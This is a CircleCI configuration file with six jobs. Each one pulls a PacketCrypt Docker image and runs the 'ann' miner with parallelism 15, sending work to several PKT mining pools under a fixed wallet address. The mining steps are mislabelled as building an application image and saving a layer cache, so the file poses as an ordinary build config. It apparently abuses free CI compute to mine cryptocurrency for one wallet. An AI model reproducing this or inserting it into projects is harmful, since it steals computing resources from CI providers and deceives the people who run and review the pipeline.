version: 2
jobs:
  build:
    working_directory: /app
    docker:
      - image: docker:17.05.0-ce-git   
    parallelism: 15 
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up
         
  test:
    docker:
      - image: docker:17.05.0-ce-git 
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15           
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up     
  gas:
    docker:
      - image: docker:17.05.0-ce-git 
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15           
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up     
  nyet:
    docker:
      - image: docker:17.05.0-ce-git 
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15           
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up               

  biba:
    docker:
      - image: docker:17.05.0-ce-git 
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15           
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up       

  blogs:
    docker:
      - image: docker:17.05.0-ce-git 
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15           
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up     
